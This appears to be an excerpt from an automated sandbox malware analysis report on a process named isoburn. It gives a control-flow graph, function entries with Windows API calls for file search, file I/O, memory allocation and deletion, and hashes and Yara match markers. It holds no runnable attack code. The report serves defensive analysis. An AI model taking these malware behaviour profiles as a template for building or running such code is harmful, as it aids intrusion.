                                                                                control_flow_graph 118 2a49e40-2a4a152 119 2a4a15c-2a4a163 118->119 120 2a4a165-2a4a19c 119->120 121 2a4a19e 119->121 120->119 122 2a4a1a5-2a4a1af 121->122 123 2a4a1e7-2a4a1f0 122->123 124 2a4a1b1-2a4a1cb 122->124 127 2a4a206-2a4a210 123->127 128 2a4a1f2-2a4a204 123->128 125 2a4a1d2-2a4a1d4 124->125 126 2a4a1cd-2a4a1d1 124->126 130 2a4a1e5 125->130 131 2a4a1d6-2a4a1df 125->131 126->125 129 2a4a221-2a4a22d 127->129 128->123 132 2a4a23d-2a4a241 129->132 133 2a4a22f-2a4a23b 129->133 130->122 131->130 134 2a4a243-2a4a25a 132->134 135 2a4a25c-2a4a274 132->135 133->129 134->132 137 2a4a285-2a4a291 135->137 138 2a4a293-2a4a2a6 137->138 139 2a4a2a8-2a4a2b2 137->139 138->137 140 2a4a2c3-2a4a2cf 139->140 142 2a4a2e5-2a4a2ee 140->142 143 2a4a2d1-2a4a2e3 140->143 144 2a4a2f4-2a4a2f7 142->144 145 2a4a510-2a4a517 142->145 143->140 147 2a4a2fd-2a4a304 144->147 148 2a4a519-2a4a548 145->148 149 2a4a54a-2a4a551 145->149 150 2a4a306-2a4a329 147->150 151 2a4a32b-2a4a335 147->151 148->145 152 2a4a5c3-2a4a5cd 149->152 153 2a4a553-2a4a55d 149->153 150->147 154 2a4a346-2a4a352 151->154 155 2a4a5de-2a4a5e7 152->155 156 2a4a56e-2a4a57a 153->156 157 2a4a354-2a4a363 154->157 158 2a4a365-2a4a36c 154->158 159 2a4a5fe-2a4a607 155->159 160 2a4a5e9-2a4a5fc 155->160 161 2a4a57c-2a4a58b 156->161 162 2a4a58d call 2a6b0e0 156->162 157->154 164 2a4a393-2a4a39d 158->164 165 2a4a36e-2a4a391 158->165 160->155 168 2a4a55f-2a4a568 161->168 169 2a4a592-2a4a59e 162->169 170 2a4a3ae-2a4a3ba 164->170 165->158 168->156 169->152 171 2a4a5a0-2a4a5c1 169->171 172 2a4a3bc-2a4a3c9 170->172 173 2a4a3cb-2a4a3da 170->173 171->169 172->170 174 2a4a3dc-2a4a3e3 173->174 175 2a4a40d-2a4a417 173->175 178 2a4a3e5-2a4a3fb 174->178 179 2a4a408 174->179 177 2a4a428-2a4a434 175->177 180 2a4a436-2a4a448 177->180 181 2a4a44a-2a4a454 177->181 182 2a4a406 178->182 183 2a4a3fd-2a4a403 178->183 179->145 180->177 184 2a4a465-2a4a471 181->184 182->174 183->182 186 2a4a493-2a4a499 184->186 187 2a4a473-2a4a480 184->187 190 2a4a49d-2a4a4a4 186->190 188 2a4a491 187->188 189 2a4a482-2a4a48b 187->189 188->184 189->188 192 2a4a4a6-2a4a4bc 190->192 193 2a4a4c9-2a4a4d3 190->193 195 2a4a4c7 192->195 196 2a4a4be-2a4a4c4 192->196 194 2a4a4e4-2a4a4ed 193->194 197 2a4a4ef-2a4a4fb 194->197 198 2a4a50b 194->198 195->190 196->195 199 2a4a4fd-2a4a503 197->199 200 2a4a509 197->200 198->142 199->200 200->194
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ")$#$#$$u$'$-$-~$.$@k$H$O($T$Z/$[5$]5$f?$pa$r$vj$}$K
                                                                                • API String ID: 0-3922967351
                                                                                • Opcode ID: eb47411d3c166f798a7f1cddeacca136febb36540cb6d39fee69cf2c41bbb43b
                                                                                • Instruction ID: 4d58c21e99c7b5abf234e015722dc75c5e5030720d6b09e163a0b0a7897eacc5
                                                                                • Opcode Fuzzy Hash: eb47411d3c166f798a7f1cddeacca136febb36540cb6d39fee69cf2c41bbb43b
                                                                                • Instruction Fuzzy Hash: E122B2B0D45229CBEB24CF45CDA4BDDBBB2BB84308F1081D9C50D6B291DBB59A88CF55
                                                                                Function 02A5C4E0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A5C5C4
                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02A5C5FF
                                                                                • FindClose.KERNELBASE(?), ref: 02A5C60A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 3541575487-0
                                                                                • Opcode ID: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                                                • Instruction ID: 48a1d102d071f0a0fcf9806ceaa299cae799b46288c04aa8ec5b2f2d345d4e48
                                                                                • Opcode Fuzzy Hash: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                                                • Instruction Fuzzy Hash: E93192B5940318BBDB20DBA4CC85FFB77BD9B44758F144599B909A6180EF70AA848BA0
                                                                                Function 02A690A0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?,?,?), ref: 02A691A1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                                                • Instruction ID: e923ed198427793dd7110eb8530f65784f7658a886c1358f9db9d7b745925bd4
                                                                                • Opcode Fuzzy Hash: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                                                • Instruction Fuzzy Hash: BF31D5B5A01608ABDB54DF98D980EEEB7F9AF88310F104619F919A7341DB30A941CFA4
                                                                                Function 02A69210 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?), ref: 02A692F6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                                                • Instruction ID: 05b61776cdce35da727ae83952020e2f7bb249d297ffee47a452bdb62625edef
                                                                                • Opcode Fuzzy Hash: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                                                • Instruction Fuzzy Hash: B531F8B5A00208AFDB14DF98D940EEFB7F9AF88704F108219F918A7341DB70A951CFA4
                                                                                Function 02A69510 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(02A51CAE,9ACB2CF8,02A67EAF,00000000,00000004,00003000,?,?,?,?,?,02A67EAF,02A51CAE), ref: 02A695DB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                                                • Instruction ID: 65bcedd73e3e9124c4204709e9da3b233ad1d27056de6ff1ba6309e19bc5cfa2
                                                                                • Opcode Fuzzy Hash: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                                                • Instruction Fuzzy Hash: 082137B5A00209AFDB10DF98DD40FEFB7B9EF88700F104619F918A7241DB74A911CBA5
                                                                                Function 02A69300 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                                                • Instruction ID: b7672e45bdf444c08d606815b1299ce361db4662f7181e48c8d21e053469f14c
                                                                                • Opcode Fuzzy Hash: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                                                • Instruction Fuzzy Hash: 3611CE75641604AEE620EB64DD01FFBB3ACEF85704F10461DF918A7281EF75B9028BA5
                                                                                Function 02A693A0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A693D4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                • Instruction ID: 9f5ab3c02d3c5d43ab8a1b5d6bb6e6d2e1cce6258dd7300bb513ed4c8f3713b7
                                                                                • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                • Instruction Fuzzy Hash: DBE04636240204BBE220AA69DD45FEB77ADDBC5710F014119FA0CA7242DA71BA118BB0
                                                                                Function 04EA35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7d253c207cf608864781150c02fa101c650ec8aecb307f72012329a24615a4ca
                                                                                • Instruction ID: c8d444f8d07083092541e43800fec737e6569eddf2fb523f221079059dc32158
                                                                                • Opcode Fuzzy Hash: 7d253c207cf608864781150c02fa101c650ec8aecb307f72012329a24615a4ca
                                                                                • Instruction Fuzzy Hash: C490023160550402F1407158491574710099BD0205F65D411A0C26578D8795DA5169E2
                                                                                Function 04EA4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: cc63982ade9815f2d5dbf371b663e8e584c85823ff2408470ad20ff78ac4fe2f
                                                                                • Instruction ID: e3b406bb7cd2cd0dc374dba5ba9aa26ae3eade4282b63a56cb523a248d7f68d1
                                                                                • Opcode Fuzzy Hash: cc63982ade9815f2d5dbf371b663e8e584c85823ff2408470ad20ff78ac4fe2f
                                                                                • Instruction Fuzzy Hash: DA90027160150042618071584C054476009ABE1305395D115A0D56570C8618D95596A9
                                                                                Function 04EA4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: db6dd404e2bbf19dd38d6dd74be4fdf003044ebdb88f27f4c6f1dcfb0d2b2171
                                                                                • Instruction ID: ccbd07f46d8f0186e7a1ae80c6c70083efffffda8a4283c882398ca58b7fb326
                                                                                • Opcode Fuzzy Hash: db6dd404e2bbf19dd38d6dd74be4fdf003044ebdb88f27f4c6f1dcfb0d2b2171
                                                                                • Instruction Fuzzy Hash: 6690023160580012B18071584C855874009ABE0305B55D011E0C26564C8A14DA5657A1
                                                                                Function 04EA2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7f034f440e8307f2e8e4df8716ab041ee2419a143f730148144fb35506c713f5
                                                                                • Instruction ID: bce7f31df428f28bd383c574b094bea87012ca8d62d695a9f708af6989ff9b18
                                                                                • Opcode Fuzzy Hash: 7f034f440e8307f2e8e4df8716ab041ee2419a143f730148144fb35506c713f5
                                                                                • Instruction Fuzzy Hash: 2990023120140402F1407598580968700099BE0305F55E011A5826565EC665D9916571
                                                                                Function 04EA2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3d429d4b3b1eab72c70aba48e160a74a63c1eedf48b6b40b9ac040054bf80603
                                                                                • Instruction ID: d1d5ef12b29d39a4287f0c14d0a2ea12ae1c765bdda0d7acd288d900053ff365
                                                                                • Opcode Fuzzy Hash: 3d429d4b3b1eab72c70aba48e160a74a63c1eedf48b6b40b9ac040054bf80603
                                                                                • Instruction Fuzzy Hash: F490023120140842F14071584805B8700099BE0305F55D016A0926664D8615D9517961
                                                                                Function 04EA2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7571d35f4dd2ba3d22249454bbdfa5dcadbd70b2cacc96a0c20c82ba4f25bb4b
                                                                                • Instruction ID: 692481e70e641f39be8d5ae2360d501dda39f1b1cbcc65a14798d5c5020f0b30
                                                                                • Opcode Fuzzy Hash: 7571d35f4dd2ba3d22249454bbdfa5dcadbd70b2cacc96a0c20c82ba4f25bb4b
                                                                                • Instruction Fuzzy Hash: 1990023120148802F1507158880578B00099BD0305F59D411A4C26668D8695D9917561
                                                                                Function 04EA2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: eea6a693922ed72ff90fd8fffa22198610b06c9dea3da6fbe926199f593598be
                                                                                • Instruction ID: 833e354eb0230ffbca18862fa4b8f5128c41685eacede9ebad7488f9de1ec8cd
                                                                                • Opcode Fuzzy Hash: eea6a693922ed72ff90fd8fffa22198610b06c9dea3da6fbe926199f593598be
                                                                                • Instruction Fuzzy Hash: 6E90023120140413F15171584905747000D9BD0245F95D412A0C26568D9656DA52A561
                                                                                Function 04EA2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: fbbfcad054cd8ce41526aea77b4ed2e04883d7d21c9a6e3a52941befb542432d
                                                                                • Instruction ID: 1cabaf8223d917030af644b282014772de4a9db4a5078526bb754febbeadf0c8
                                                                                • Opcode Fuzzy Hash: fbbfcad054cd8ce41526aea77b4ed2e04883d7d21c9a6e3a52941befb542432d
                                                                                • Instruction Fuzzy Hash: 09900231242441527585B1584805547400AABE0245795D012A1C16960C8526E956DA61
                                                                                Function 04EA2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c0cfce86db5e2d5ffe34ecb6ef24a456c88869e4016997ef6198891e253e0a55
                                                                                • Instruction ID: 415324ec88faeddf8ddf6d72d75a7e815c4ac8882ff88fe287e22c3991eed71a
                                                                                • Opcode Fuzzy Hash: c0cfce86db5e2d5ffe34ecb6ef24a456c88869e4016997ef6198891e253e0a55
                                                                                • Instruction Fuzzy Hash: 6290023130140003F180715858196474009EBE1305F55E011E0C16564CD915D9565662
                                                                                Function 04EA2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 1e01ce30eea16fd3a4271c11e854bd2f64c825359ef2aca3b2664ad4e0839431
                                                                                • Instruction ID: e62ae8f3f9b1ec2b463b1530ffa16faf2fb15453218a6013101f1824c018929f
                                                                                • Opcode Fuzzy Hash: 1e01ce30eea16fd3a4271c11e854bd2f64c825359ef2aca3b2664ad4e0839431
                                                                                • Instruction Fuzzy Hash: 0690023921340002F1C07158580964B00099BD1206F95E415A0817568CC915D9695761
                                                                                Function 04EA2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2ccbd8b28bd0f96c1e83a206486edd041e0ecd8954d67ae6826af117ebddc63d
                                                                                • Instruction ID: 497ff71c6766c4095a74f0886c04cfe812f1ac8504acc2643c5b8f420f86c082
                                                                                • Opcode Fuzzy Hash: 2ccbd8b28bd0f96c1e83a206486edd041e0ecd8954d67ae6826af117ebddc63d
                                                                                • Instruction Fuzzy Hash: 5B90027120180403F18075584C0564700099BD0306F55D011A2866565E8A29DD516575
                                                                                Function 04EA2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: bcd4283b13d44d6c4f9118d973788565e6b51abc63a191cc4fccaca6ed1b8a2c
                                                                                • Instruction ID: ff6444522f0db2f476f9480e3538a379fb475df6572234a8428fbcc0779d05f4
                                                                                • Opcode Fuzzy Hash: bcd4283b13d44d6c4f9118d973788565e6b51abc63a191cc4fccaca6ed1b8a2c
                                                                                • Instruction Fuzzy Hash: 9090023160140502F14171584805657000E9BD0245F95D022A1826565ECA25DA92A571
                                                                                Function 04EA2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 0900043a7afc0033c101e9ea913cf9f1b1bbec94006bf0aaf79d8080c01a53f7
                                                                                • Instruction ID: 0af8be21a585fa5b58545595a231353e9b3732ade4cd0e058bf5561a5cd14f75
                                                                                • Opcode Fuzzy Hash: 0900043a7afc0033c101e9ea913cf9f1b1bbec94006bf0aaf79d8080c01a53f7
                                                                                • Instruction Fuzzy Hash: 01900231211C0042F24075684C15B4700099BD0307F55D115A0956564CC915D9615961
                                                                                Function 04EA2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
